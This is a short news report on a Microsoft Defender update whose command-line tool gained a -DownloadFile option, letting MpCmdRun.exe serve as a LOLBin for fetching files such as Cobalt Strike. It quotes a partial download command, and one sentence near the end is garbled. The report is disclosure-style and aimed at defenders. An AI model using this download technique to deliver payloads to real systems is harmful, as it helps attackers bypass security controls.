A recent update for Microsoft Defender accidentally turned Windows 10’s antivirus software into a “boat” carrying malicious files from the internet to a user’s computer.
According to an anti-intrusion tester named Mohammad Askar, the changes made in the Microsoft Defender command-line tool could allow hackers to use the software as a LOLBin binary.
Many LOLBin binaries currently exist in Windows 10, all with a specific function. However, if given the right priority, hackers can take advantage of these binaries to bypass security protocols and launch attacks without the victim’s knowledge.
According to Askar, the Microsoft Defender command line tool now supports a new function “-DownloadFile“. This change is believed to have taken effect from Microsoft Defender version 4.18.2007.9 or 4.18.2009.9.
As a result, an attacker on a local network can use the Microsoft Antimalware Service Command Line Utility to download a file from the internet with the following command: “MpCmdRun.exe – DownloadFile -url
Using this technique, Askar was able to download the Cobalt Strike malware from a remote server through Microsoft Defender.
While Defender will detect and eliminate any malicious files downloaded using this method, it is not clear whether other popular antivirus services can defend against this type of attack in the case of services. Whether the system default protection is turned off or not.
System administrators have now been advised to immediately update their watch list with the aforementioned new LOLBin to ensure it will not be used to launch an attack.